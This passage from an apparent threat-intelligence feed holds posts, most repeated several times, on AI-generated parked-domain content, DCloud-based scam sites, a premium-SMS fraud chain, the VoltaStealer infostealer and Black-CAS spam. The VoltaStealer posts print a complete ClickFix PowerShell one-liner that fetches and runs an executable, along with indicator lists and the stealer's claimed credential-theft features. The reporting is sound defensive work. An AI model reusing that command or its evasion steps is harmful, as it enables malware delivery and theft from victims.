    The subdomain labels are the content brief. The domain topic is the flavour. The result is grammatically sound, mildly persuasive, and reads like it was written by someone who has heard of both topics but has never encountered either. It's AI slop at its finest. The article on smoothie insurance confidently recommends coverage "for peace of mind." The one on backsplash insurance suggests you may need a specialist endorsement. Nobody proofread these. Nobody needed to — the target audience is a crawler, not a person, and crawlers don't find non-sequiturs suspicious.

    One template, one analytics pixel (stats.computer[.]com), one CDN (images.computer[.]com) — repeated across what appears to be a large portfolio of parked-for-sale domains, each advertising itself for sale in the page header while the AI content quietly earns its keep.

    Unknown subdomains redirect to the parking marketplace. Only the pre-generated keyword combinations serve content — "insurance" being the obvious choice at the CPM rates that keyword commands.

    We're not flagging a threat. It's the technique that's worth noting as an indicator of where we could be headed. RDGAs generate domain names at scale to serve malware or evade detection. This applies the same logic to content. And the wildcard DNS backend is already exactly what you'd need for the next step: on-demand generation, where a query could produce a fresh AI-written page in real time. That capability exists now. It just isn't what's running here. Yet.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #spam #adtech #rdga

  35. We track algorithms that generate domain names (RDGA). Now we're looking at one that generates the content. It's a strange collision of domain parking and AI generated nonsense.

    A portfolio of parked domains, each with a wildcard DNS record and a backend that serves pre-generated AI content for specific keyword combinations:

    - insurance.howtomakeasmoothie[.]com → "Why You Need Insurance When Making Smoothies"
    - insurance.backsplashdesign[.]com → "A Guide to Backsplash Insurance"
    - yacht.insurance.backpainmedication[.]com → a wellness journey involving sailing, spinal health, and coverage options

    The subdomain labels are the content brief. The domain topic is the flavour. The result is grammatically sound, mildly persuasive, and reads like it was written by someone who has heard of both topics but has never encountered either. It's AI slop at its finest. The article on smoothie insurance confidently recommends coverage "for peace of mind." The one on backsplash insurance suggests you may need a specialist endorsement. Nobody proofread these. Nobody needed to — the target audience is a crawler, not a person, and crawlers don't find non-sequiturs suspicious.

    One template, one analytics pixel (stats.computer[.]com), one CDN (images.computer[.]com) — repeated across what appears to be a large portfolio of parked-for-sale domains, each advertising itself for sale in the page header while the AI content quietly earns its keep.

    Unknown subdomains redirect to the parking marketplace. Only the pre-generated keyword combinations serve content — "insurance" being the obvious choice at the CPM rates that keyword commands.

    We're not flagging a threat. It's the technique that's worth noting as an indicator of where we could be headed. RDGAs generate domain names at scale to serve malware or evade detection. This applies the same logic to content. And the wildcard DNS backend is already exactly what you'd need for the next step: on-demand generation, where a query could produce a fresh AI-written page in real time. That capability exists now. It just isn't what's running here. Yet.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #spam #adtech #rdga

  36. We track algorithms that generate domain names (RDGA). Now we're looking at one that generates the content. It's a strange collision of domain parking and AI generated nonsense.

    A portfolio of parked domains, each with a wildcard DNS record and a backend that serves pre-generated AI content for specific keyword combinations:

    - insurance.howtomakeasmoothie[.]com → "Why You Need Insurance When Making Smoothies"
    - insurance.backsplashdesign[.]com → "A Guide to Backsplash Insurance"
    - yacht.insurance.backpainmedication[.]com → a wellness journey involving sailing, spinal health, and coverage options

    The subdomain labels are the content brief. The domain topic is the flavour. The result is grammatically sound, mildly persuasive, and reads like it was written by someone who has heard of both topics but has never encountered either. It's AI slop at its finest. The article on smoothie insurance confidently recommends coverage "for peace of mind." The one on backsplash insurance suggests you may need a specialist endorsement. Nobody proofread these. Nobody needed to — the target audience is a crawler, not a person, and crawlers don't find non-sequiturs suspicious.

    One template, one analytics pixel (stats.computer[.]com), one CDN (images.computer[.]com) — repeated across what appears to be a large portfolio of parked-for-sale domains, each advertising itself for sale in the page header while the AI content quietly earns its keep.

    Unknown subdomains redirect to the parking marketplace. Only the pre-generated keyword combinations serve content — "insurance" being the obvious choice at the CPM rates that keyword commands.

    We're not flagging a threat. It's the technique that's worth noting as an indicator of where we could be headed. RDGAs generate domain names at scale to serve malware or evade detection. This applies the same logic to content. And the wildcard DNS backend is already exactly what you'd need for the next step: on-demand generation, where a query could produce a fresh AI-written page in real time. That capability exists now. It just isn't what's running here. Yet.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #spam #adtech #rdga

  37. ----------------

    🎯 Threat Intelligence
    ===================

    Infoblox Threat Intel published research on DCloud Uni-App, a Chinese open-source cross-platform development framework (analogous to React Native or Flutter) that has become the technical foundation for a massive, decentralized scam infrastructure ecosystem primarily operated by Chinese threat actors.

    Background

    In 2024, the Argentine town of San Pedro made international headlines when approximately 20% of its population, including the chief of police and city council members, discovered that RainbowEx, a cryptocurrency platform they had invested in and promoted, was a coordinated scam. RainbowEx displayed fictional trading activity, drained victim deposits via stablecoin transfers, and blocked withdrawals once publicly exposed. The New York Times, Buenos Aires Herald, and La Opinión Semanario covered the scandal.

    Core Discovery

    RainbowEx was not bespoke fraud. Its entire visual scaffolding, registration flow, trading dashboard, and Telegram-driven price calls were built using DCloud Uni-App, an open-source toolkit that lets developers write a single Vue.js codebase and deploy across mobile, desktop, and web simultaneously. The scam was assembled from a shared template.

    Scale

    Infoblox identified 236,493 distinct second-level domains built with DCloud as scam infrastructure. The fraud types span fake cryptocurrency exchanges, multi-language pig-butchering operations, WhatsApp phishing networks, fake gambling platforms, brand-impersonation sites, and crypto wallet drainers. RainbowEx was one chapter of a much larger, older, and still-active operation.

    Threat Actor Mapping

    Infoblox mapped hosting patterns and private technical fingerprints that point to at least one large-scale threat actor controlling a significant portion of these scam sites. The infrastructure shows partial centralization despite the decentralized nature of the scam ecosystem.

    Physical-World Crossover

    The same template family anchors physical-world fraud operations, including the 2024-2025 Lightning Shared Scooter Co. (LSSC) mobility investment scam (covered by NBC News) and an active bicycle-sharing investment scam registered with the U.S. Treasury Department as a money-services business, currently recruiting American investors.

    Detection

    Every Uni-App project leaves recognizable default artifacts. Defenders can identify DCloud-built websites through code signatures, map scam infrastructure at scale across disparate fraud types, track hosting patterns correlated with specific threat actors, and correlate seemingly unrelated scams through shared technical scaffolding.

    Caveat: DCloud is a legitimate Beijing-based company. No evidence of involvement in the fraudulent use of its framework.

    🔹 ThreatIntel #DCloud #ScamInfrastructure #Infoblox #PigButchering

    🔗 Source: infoblox.com/blog/threat-intel

  38. One tap to continue watching. Also: one tap to charge your phone bill €4.50. Click2SMS, what good are you, anyway?

    A redirect chain took us from a compromised legitimate site, through help_tds, then through a familiar Germany-based commercial TDS, to hmtraff[.]com where we finally arrived at d[.]gosmartdecision[.]com — part of an IRSF ecosystem we've been tracking since our fake CAPTCHA report.

    The landing page shows a fake video player. A large "Continue" button sits in front of it. That button is <a href="sms:81183?body=360 *CWZQ...">. One tap opens the SMS app, pre-loaded with a message to a premium-rate French shortcode. 4.50 EUR per code.

    Where the fake CAPTCHA required four separate actions to maintain a verification illusion, the video player needs one. Simpler, faster, probably more effective. The legal disclosure with the price is below the fold in 10pt text, while the large "Continue" button is in the middle of the screen.

    There's a second bonus layer: the page runs device fingerprinting and injects a credit card collection form for non-mobile visitors — cardholder name, number, CVV, expiry. Mobile French users see the Click2SMS flow. Others may get card phishing. Two modes. One domain. DNS-visible delivery chain throughout.

    hmtraff[.]com
    d[.]gosmartdecision[.]com

    Final landing page: urlscan.io/result/019f14b2-c99

    Prior report: infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #smishing #tds #irsf

  39. One tap to continue watching. Also: one tap to charge your phone bill €4.50. Click2SMS, what good are you, anyway?

    A redirect chain took us from a compromised legitimate site, through help_tds, then through a familiar Germany-based commercial TDS, to hmtraff[.]com where we finally arrived at d[.]gosmartdecision[.]com — part of an IRSF ecosystem we've been tracking since our fake CAPTCHA report.

    The landing page shows a fake video player. A large "Continue" button sits in front of it. That button is <a href="sms:81183?body=360 *CWZQ...">. One tap opens the SMS app, pre-loaded with a message to a premium-rate French shortcode. 4.50 EUR per code.

    Where the fake CAPTCHA required four separate actions to maintain a verification illusion, the video player needs one. Simpler, faster, probably more effective. The legal disclosure with the price is below the fold in 10pt text, while the large "Continue" button is in the middle of the screen.

    There's a second bonus layer: the page runs device fingerprinting and injects a credit card collection form for non-mobile visitors — cardholder name, number, CVV, expiry. Mobile French users see the Click2SMS flow. Others may get card phishing. Two modes. One domain. DNS-visible delivery chain throughout.

    hmtraff[.]com
    d[.]gosmartdecision[.]com

    Final landing page: urlscan.io/result/019f14b2-c99

    Prior report: infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #smishing #tds #irsf

  40. One tap to continue watching. Also: one tap to charge your phone bill €4.50. Click2SMS, what good are you, anyway?

    A redirect chain took us from a compromised legitimate site, through help_tds, then through a familiar Germany-based commercial TDS, to hmtraff[.]com where we finally arrived at d[.]gosmartdecision[.]com — part of an IRSF ecosystem we've been tracking since our fake CAPTCHA report.

    The landing page shows a fake video player. A large "Continue" button sits in front of it. That button is <a href="sms:81183?body=360 *CWZQ...">. One tap opens the SMS app, pre-loaded with a message to a premium-rate French shortcode. 4.50 EUR per code.

    Where the fake CAPTCHA required four separate actions to maintain a verification illusion, the video player needs one. Simpler, faster, probably more effective. The legal disclosure with the price is below the fold in 10pt text, while the large "Continue" button is in the middle of the screen.

    There's a second bonus layer: the page runs device fingerprinting and injects a credit card collection form for non-mobile visitors — cardholder name, number, CVV, expiry. Mobile French users see the Click2SMS flow. Others may get card phishing. Two modes. One domain. DNS-visible delivery chain throughout.

    hmtraff[.]com
    d[.]gosmartdecision[.]com

    Final landing page: urlscan.io/result/019f14b2-c99

    Prior report: infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #smishing #tds #irsf

  41. One tap to continue watching. Also: one tap to charge your phone bill €4.50. Click2SMS, what good are you, anyway?

    A redirect chain took us from a compromised legitimate site, through help_tds, then through a familiar Germany-based commercial TDS, to hmtraff[.]com where we finally arrived at d[.]gosmartdecision[.]com — part of an IRSF ecosystem we've been tracking since our fake CAPTCHA report.

    The landing page shows a fake video player. A large "Continue" button sits in front of it. That button is <a href="sms:81183?body=360 *CWZQ...">. One tap opens the SMS app, pre-loaded with a message to a premium-rate French shortcode. 4.50 EUR per code.

    Where the fake CAPTCHA required four separate actions to maintain a verification illusion, the video player needs one. Simpler, faster, probably more effective. The legal disclosure with the price is below the fold in 10pt text, while the large "Continue" button is in the middle of the screen.

    There's a second bonus layer: the page runs device fingerprinting and injects a credit card collection form for non-mobile visitors — cardholder name, number, CVV, expiry. Mobile French users see the Click2SMS flow. Others may get card phishing. Two modes. One domain. DNS-visible delivery chain throughout.

    hmtraff[.]com
    d[.]gosmartdecision[.]com

    Final landing page: urlscan.io/result/019f14b2-c99

    Prior report: infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #smishing #tds #irsf

  42. One tap to continue watching. Also: one tap to charge your phone bill €4.50. Click2SMS, what good are you, anyway?

    A redirect chain took us from a compromised legitimate site, through help_tds, then through a familiar Germany-based commercial TDS, to hmtraff[.]com where we finally arrived at d[.]gosmartdecision[.]com — part of an IRSF ecosystem we've been tracking since our fake CAPTCHA report.

    The landing page shows a fake video player. A large "Continue" button sits in front of it. That button is <a href="sms:81183?body=360 *CWZQ...">. One tap opens the SMS app, pre-loaded with a message to a premium-rate French shortcode. 4.50 EUR per code.

    Where the fake CAPTCHA required four separate actions to maintain a verification illusion, the video player needs one. Simpler, faster, probably more effective. The legal disclosure with the price is below the fold in 10pt text, while the large "Continue" button is in the middle of the screen.

    There's a second bonus layer: the page runs device fingerprinting and injects a credit card collection form for non-mobile visitors — cardholder name, number, CVV, expiry. Mobile French users see the Click2SMS flow. Others may get card phishing. Two modes. One domain. DNS-visible delivery chain throughout.

    hmtraff[.]com
    d[.]gosmartdecision[.]com

    Final landing page: urlscan.io/result/019f14b2-c99

    Prior report: infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #smishing #tds #irsf

  43. 👻 VoltaStealer was basically a ghost story. A slick, evasion-obsessed new infostealer hyped by its author on dark web forums, but no one reported seeing one in the wild, until now.

    While tracking a ClickFix actor, we pivoted on a known IOC into an open directory holding a very interesting payload. Artifacts and circumstantial evidence point to one suspect: VoltaStealer. We believe this is the first known sample. 🔬

    The delivery is textbook verification and fatigue bait: fraudulent sites dressed up as "security checks" and fake CAPTCHAs. Tick the "I'm not a robot" box and the page silently copies a malicious PowerShell one-liner to your clipboard. The ClickFix lure page then instructs victims to open the Windows Run dialog and enter the paste hotkey command, which fetches the malware. No exploit required, just a checkbox and trust. 🤖

    What VoltaStealer claims it can do (per its own MaaS sales pitch, surfaced via Axur's dark web monitoring):
    🔴 Runs fully in memory — custom encryption/obfuscation, minimal disk artifacts
    🔴 Heavy evasion — anti-VM/sandbox/debug, direct syscalls, runtime FUD, ~75% build uniqueness, chunked exfil to stay quiet
    🔴 Grabs everything — passwords, cookies, auth tokens, browser + desktop crypto wallets, Telegram sessions, VPN configs, and files via regex scanning
    🔴 Fast & greedy — 5–10s execution, ~95% "hit rate" claim, partial upload even if interrupted, no persistence
    🔴 Full storefront — web panel + builder, dashboards, API, team roles, clipper/loader/file-grabber modules, tiered subs

    In other words: vapor no more. 💨

    ⛔ VoltaStealer C2:
    usevolta[.]su

    ⛔ VoltaStealer Payloads (SHA256):
    2be779fc085dd89cf9e042cbcf32ee6da0cd0e3106e9dca49d52b7a839b1aa8f
    253f53b2453f8bff642421cfa5d851af8fc7100409397d80643bd792a7e38edb

    ⛔ ClickFix PowerShell command (Not VoltaStealer):
    command: "powershell -nop -w h -ep bypass -c \"$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';$f=$env:TEMP+'\\\\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f"

    ⛔ Malware payload (Not VoltaStealer) dropped via ClickFix malicious command (SHA256):
    6a6f16d7202e64fea38a757b5151a39099124a1bf55ba55e62d58f3ae102f7e8

    ⛔ ClickFix actor domains:
    comalign[.]pro
    zorivian[.]pro
    nexalora[.]pro
    kovraxis[.]com
    mevrio[.]com
    krebbo[.]world
    wobblify[.]cfd
    yovu[.]world
    glimmerix[.]pro
    launcherpatch[.]com
    grembix[.]cfd
    wumlo[.]shop
    plonkert[.]cfd
    volpo[.]cfd
    fleepax[.]cfd
    zixlo[.]cfd
    quobnar[.]world
    riotmourner[.]pro
    youfound[.]fun

    Rule of thumb: real CAPTCHAs don't ask you to open the Windows Run dialog and paste in a command. If one does, close the page. 🛑

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #clickfix #infostealer #voltastealer #maas #malware #captcha #axur

  44. 👻 VoltaStealer was basically a ghost story. A slick, evasion-obsessed new infostealer hyped by its author on dark web forums, but no one reported seeing one in the wild, until now.

    While tracking a ClickFix actor, we pivoted on a known IOC into an open directory holding a very interesting payload. Artifacts and circumstantial evidence point to one suspect: VoltaStealer. We believe this is the first known sample. 🔬

    The delivery is textbook verification and fatigue bait: fraudulent sites dressed up as "security checks" and fake CAPTCHAs. Tick the "I'm not a robot" box and the page silently copies a malicious PowerShell one-liner to your clipboard. The ClickFix lure page then instructs victims to open the Windows Run dialog and enter the paste hotkey command, which fetches the malware. No exploit required, just a checkbox and trust. 🤖

    What VoltaStealer claims it can do (per its own MaaS sales pitch, surfaced via Axur's dark web monitoring):
    🔴 Runs fully in memory — custom encryption/obfuscation, minimal disk artifacts
    🔴 Heavy evasion — anti-VM/sandbox/debug, direct syscalls, runtime FUD, ~75% build uniqueness, chunked exfil to stay quiet
    🔴 Grabs everything — passwords, cookies, auth tokens, browser + desktop crypto wallets, Telegram sessions, VPN configs, and files via regex scanning
    🔴 Fast & greedy — 5–10s execution, ~95% "hit rate" claim, partial upload even if interrupted, no persistence
    🔴 Full storefront — web panel + builder, dashboards, API, team roles, clipper/loader/file-grabber modules, tiered subs

    In other words: vapor no more. 💨

    ⛔ VoltaStealer C2:
    usevolta[.]su

    ⛔ VoltaStealer Payloads (SHA256):
    2be779fc085dd89cf9e042cbcf32ee6da0cd0e3106e9dca49d52b7a839b1aa8f
    253f53b2453f8bff642421cfa5d851af8fc7100409397d80643bd792a7e38edb

    ⛔ ClickFix PowerShell command (Not VoltaStealer):
    command: "powershell -nop -w h -ep bypass -c \"$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';$f=$env:TEMP+'\\\\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f"

    ⛔ Malware payload (Not VoltaStealer) dropped via ClickFix malicious command (SHA256):
    6a6f16d7202e64fea38a757b5151a39099124a1bf55ba55e62d58f3ae102f7e8

    ⛔ ClickFix actor domains:
    comalign[.]pro
    zorivian[.]pro
    nexalora[.]pro
    kovraxis[.]com
    mevrio[.]com
    krebbo[.]world
    wobblify[.]cfd
    yovu[.]world
    glimmerix[.]pro
    launcherpatch[.]com
    grembix[.]cfd
    wumlo[.]shop
    plonkert[.]cfd
    volpo[.]cfd
    fleepax[.]cfd
    zixlo[.]cfd
    quobnar[.]world
    riotmourner[.]pro
    youfound[.]fun

    Rule of thumb: real CAPTCHAs don't ask you to open the Windows Run dialog and paste in a command. If one does, close the page. 🛑

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #clickfix #infostealer #voltastealer #maas #malware #captcha #axur

  45. 👻 VoltaStealer was basically a ghost story. A slick, evasion-obsessed new infostealer hyped by its author on dark web forums, but no one reported seeing one in the wild, until now.

    While tracking a ClickFix actor, we pivoted on a known IOC into an open directory holding a very interesting payload. Artifacts and circumstantial evidence point to one suspect: VoltaStealer. We believe this is the first known sample. 🔬

    The delivery is textbook verification and fatigue bait: fraudulent sites dressed up as "security checks" and fake CAPTCHAs. Tick the "I'm not a robot" box and the page silently copies a malicious PowerShell one-liner to your clipboard. The ClickFix lure page then instructs victims to open the Windows Run dialog and enter the paste hotkey command, which fetches the malware. No exploit required, just a checkbox and trust. 🤖

    What VoltaStealer claims it can do (per its own MaaS sales pitch, surfaced via Axur's dark web monitoring):
    🔴 Runs fully in memory — custom encryption/obfuscation, minimal disk artifacts
    🔴 Heavy evasion — anti-VM/sandbox/debug, direct syscalls, runtime FUD, ~75% build uniqueness, chunked exfil to stay quiet
    🔴 Grabs everything — passwords, cookies, auth tokens, browser + desktop crypto wallets, Telegram sessions, VPN configs, and files via regex scanning
    🔴 Fast & greedy — 5–10s execution, ~95% "hit rate" claim, partial upload even if interrupted, no persistence
    🔴 Full storefront — web panel + builder, dashboards, API, team roles, clipper/loader/file-grabber modules, tiered subs

    In other words: vapor no more. 💨

    ⛔ VoltaStealer C2:
    usevolta[.]su

    ⛔ VoltaStealer Payloads (SHA256):
    2be779fc085dd89cf9e042cbcf32ee6da0cd0e3106e9dca49d52b7a839b1aa8f
    253f53b2453f8bff642421cfa5d851af8fc7100409397d80643bd792a7e38edb

    ⛔ ClickFix PowerShell command (Not VoltaStealer):
    command: "powershell -nop -w h -ep bypass -c \"$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';$f=$env:TEMP+'\\\\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f"

    ⛔ Malware payload (Not VoltaStealer) dropped via ClickFix malicious command (SHA256):
    6a6f16d7202e64fea38a757b5151a39099124a1bf55ba55e62d58f3ae102f7e8

    ⛔ ClickFix actor domains:
    comalign[.]pro
    zorivian[.]pro
    nexalora[.]pro
    kovraxis[.]com
    mevrio[.]com
    krebbo[.]world
    wobblify[.]cfd
    yovu[.]world
    glimmerix[.]pro
    launcherpatch[.]com
    grembix[.]cfd
    wumlo[.]shop
    plonkert[.]cfd
    volpo[.]cfd
    fleepax[.]cfd
    zixlo[.]cfd
    quobnar[.]world
    riotmourner[.]pro
    youfound[.]fun

    Rule of thumb: real CAPTCHAs don't ask you to open the Windows Run dialog and paste in a command. If one does, close the page. 🛑

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #clickfix #infostealer #voltastealer #maas #malware #captcha #axur

  46. 👻 VoltaStealer was basically a ghost story. A slick, evasion-obsessed new infostealer hyped by its author on dark web forums, but no one reported seeing one in the wild, until now.

    While tracking a ClickFix actor, we pivoted on a known IOC into an open directory holding a very interesting payload. Artifacts and circumstantial evidence point to one suspect: VoltaStealer. We believe this is the first known sample. 🔬

    The delivery is textbook verification and fatigue bait: fraudulent sites dressed up as "security checks" and fake CAPTCHAs. Tick the "I'm not a robot" box and the page silently copies a malicious PowerShell one-liner to your clipboard. The ClickFix lure page then instructs victims to open the Windows Run dialog and enter the paste hotkey command, which fetches the malware. No exploit required, just a checkbox and trust. 🤖

    What VoltaStealer claims it can do (per its own MaaS sales pitch, surfaced via Axur's dark web monitoring):
    🔴 Runs fully in memory — custom encryption/obfuscation, minimal disk artifacts
    🔴 Heavy evasion — anti-VM/sandbox/debug, direct syscalls, runtime FUD, ~75% build uniqueness, chunked exfil to stay quiet
    🔴 Grabs everything — passwords, cookies, auth tokens, browser + desktop crypto wallets, Telegram sessions, VPN configs, and files via regex scanning
    🔴 Fast & greedy — 5–10s execution, ~95% "hit rate" claim, partial upload even if interrupted, no persistence
    🔴 Full storefront — web panel + builder, dashboards, API, team roles, clipper/loader/file-grabber modules, tiered subs

    In other words: vapor no more. 💨

    ⛔ VoltaStealer C2:
    usevolta[.]su

    ⛔ VoltaStealer Payloads (SHA256):
    2be779fc085dd89cf9e042cbcf32ee6da0cd0e3106e9dca49d52b7a839b1aa8f
    253f53b2453f8bff642421cfa5d851af8fc7100409397d80643bd792a7e38edb

    ⛔ ClickFix PowerShell command (Not VoltaStealer):
    command: "powershell -nop -w h -ep bypass -c \"$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';$f=$env:TEMP+'\\\\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f"

    ⛔ Malware payload (Not VoltaStealer) dropped via ClickFix malicious command (SHA256):
    6a6f16d7202e64fea38a757b5151a39099124a1bf55ba55e62d58f3ae102f7e8

    ⛔ ClickFix actor domains:
    comalign[.]pro
    zorivian[.]pro
    nexalora[.]pro
    kovraxis[.]com
    mevrio[.]com
    krebbo[.]world
    wobblify[.]cfd
    yovu[.]world
    glimmerix[.]pro
    launcherpatch[.]com
    grembix[.]cfd
    wumlo[.]shop
    plonkert[.]cfd
    volpo[.]cfd
    fleepax[.]cfd
    zixlo[.]cfd
    quobnar[.]world
    riotmourner[.]pro
    youfound[.]fun

    Rule of thumb: real CAPTCHAs don't ask you to open the Windows Run dialog and paste in a command. If one does, close the page. 🛑

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #clickfix #infostealer #voltastealer #maas #malware #captcha #axur

  47. 👻 VoltaStealer was basically a ghost story. A slick, evasion-obsessed new infostealer hyped by its author on dark web forums, but no one reported seeing one in the wild, until now.

    While tracking a ClickFix actor, we pivoted on a known IOC into an open directory holding a very interesting payload. Artifacts and circumstantial evidence point to one suspect: VoltaStealer. We believe this is the first known sample. 🔬

    The delivery is textbook verification and fatigue bait: fraudulent sites dressed up as "security checks" and fake CAPTCHAs. Tick the "I'm not a robot" box and the page silently copies a malicious PowerShell one-liner to your clipboard. The ClickFix lure page then instructs victims to open the Windows Run dialog and enter the paste hotkey command, which fetches the malware. No exploit required, just a checkbox and trust. 🤖

    What VoltaStealer claims it can do (per its own MaaS sales pitch, surfaced via Axur's dark web monitoring):
    🔴 Runs fully in memory — custom encryption/obfuscation, minimal disk artifacts
    🔴 Heavy evasion — anti-VM/sandbox/debug, direct syscalls, runtime FUD, ~75% build uniqueness, chunked exfil to stay quiet
    🔴 Grabs everything — passwords, cookies, auth tokens, browser + desktop crypto wallets, Telegram sessions, VPN configs, and files via regex scanning
    🔴 Fast & greedy — 5–10s execution, ~95% "hit rate" claim, partial upload even if interrupted, no persistence
    🔴 Full storefront — web panel + builder, dashboards, API, team roles, clipper/loader/file-grabber modules, tiered subs

    In other words: vapor no more. 💨

    ⛔ VoltaStealer C2:
    usevolta[.]su

    ⛔ VoltaStealer Payloads (SHA256):
    2be779fc085dd89cf9e042cbcf32ee6da0cd0e3106e9dca49d52b7a839b1aa8f
    253f53b2453f8bff642421cfa5d851af8fc7100409397d80643bd792a7e38edb

    ⛔ ClickFix PowerShell command (Not VoltaStealer):
    command: "powershell -nop -w h -ep bypass -c \"$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';$f=$env:TEMP+'\\\\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f"

    ⛔ Malware payload (Not VoltaStealer) dropped via ClickFix malicious command (SHA256):
    6a6f16d7202e64fea38a757b5151a39099124a1bf55ba55e62d58f3ae102f7e8

    ⛔ ClickFix actor domains:
    comalign[.]pro
    zorivian[.]pro
    nexalora[.]pro
    kovraxis[.]com
    mevrio[.]com
    krebbo[.]world
    wobblify[.]cfd
    yovu[.]world
    glimmerix[.]pro
    launcherpatch[.]com
    grembix[.]cfd
    wumlo[.]shop
    plonkert[.]cfd
    volpo[.]cfd
    fleepax[.]cfd
    zixlo[.]cfd
    quobnar[.]world
    riotmourner[.]pro
    youfound[.]fun

    Rule of thumb: real CAPTCHAs don't ask you to open the Windows Run dialog and paste in a command. If one does, close the page. 🛑

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #clickfix #infostealer #voltastealer #maas #malware #captcha #axur

  48. 🚨 📡 🇯🇵 Free TV in Japan, at a Cost: "Black-CAS" Spam Campaigns

    We've been tracking a high-volume spam campaign targeting Japanese users advertising illegal "Black-CAS" services. In Japan, satellite TV channels are accessed through Conditional Access Systems (CAS), the legitimate pay-per-channel infrastructure used by Japanese broadcasters. Black-CAS exploits that system, intercepting and cloning legitimate smartcard signals to unlock paid content without a subscription.

    Beyond the piracy angle, these devices have been documented to come preloaded with malware and residential proxy clients — buyers think they're paying for cheap TV access, but they're also handing over their network to threat actors.

    The emails rotate Japanese-language subjects like "簡単に明日からタダになる、魔法のカード" ("a magic card that makes everything free starting tomorrow") or "有料放送が、ずっとただ無料です" ("paid broadcasts, free forever"). Every email carries a set of URL shortener links (clck[.]ru, u[.]to) rather than direct destination URLs — a clear detection evasion mechanism.

    The protective shortener layer hasn't made them conservative with the number of domain registrations. Behind it, the infrastructure relies heavily on RDGAs (e.g. mchj43nmd4j53[.]xyz, 87dsq65dh3[.]xyz), while bolder actors directly use overtly themed domains: blackbcas[.]xyz, black-cas-card-tv[.]lol, black-cas-card-jp-super[.]xyz.

    At the landing pages, users can directly purchase these devices, as seen in the images below.

    This week our data puts Black-CAS alongside phishing and fake shop campaigns in the top threats targeting Japanese speakers — definitely a threat to consider.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #illegalstreaming #asia #japan #blackCAS #tv #malware #residentialproxy #spam #rdga #サイバーセキュリティ #情報セキュリティ #マルウェア #迷惑メール #ブラックCAS

  49. 🚨 📡 🇯🇵 Free TV in Japan, at a Cost: "Black-CAS" Spam Campaigns

    We've been tracking a high-volume spam campaign targeting Japanese users advertising illegal "Black-CAS" services. In Japan, satellite TV channels are accessed through Conditional Access Systems (CAS), the legitimate pay-per-channel infrastructure used by Japanese broadcasters. Black-CAS exploits that system, intercepting and cloning legitimate smartcard signals to unlock paid content without a subscription.

    Beyond the piracy angle, these devices have been documented to come preloaded with malware and residential proxy clients — buyers think they're paying for cheap TV access, but they're also handing over their network to threat actors.

    The emails rotate Japanese-language subjects like "簡単に明日からタダになる、魔法のカード" ("a magic card that makes everything free starting tomorrow") or "有料放送が、ずっとただ無料です" ("paid broadcasts, free forever"). Every email carries a set of URL shortener links (clck[.]ru, u[.]to) rather than direct destination URLs — a clear detection evasion mechanism.

    The protective shortener layer hasn't made them conservative with the number of domain registrations. Behind it, the infrastructure relies heavily on RDGAs (e.g. mchj43nmd4j53[.]xyz, 87dsq65dh3[.]xyz), while bolder actors directly use overtly themed domains: blackbcas[.]xyz, black-cas-card-tv[.]lol, black-cas-card-jp-super[.]xyz.

    At the landing pages, users can directly purchase these devices, as seen in the images below.

    This week our data puts Black-CAS alongside phishing and fake shop campaigns in the top threats targeting Japanese speakers — definitely a threat to consider.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #illegalstreaming #asia #japan #blackCAS #tv #malware #residentialproxy #spam #rdga #サイバーセキュリティ #情報セキュリティ #マルウェア #迷惑メール #ブラックCAS

  50. 🚨 📡 🇯🇵 Free TV in Japan, at a Cost: "Black-CAS" Spam Campaigns

    We've been tracking a high-volume spam campaign targeting Japanese users advertising illegal "Black-CAS" services. In Japan, satellite TV channels are accessed through Conditional Access Systems (CAS), the legitimate pay-per-channel infrastructure used by Japanese broadcasters. Black-CAS exploits that system, intercepting and cloning legitimate smartcard signals to unlock paid content without a subscription.

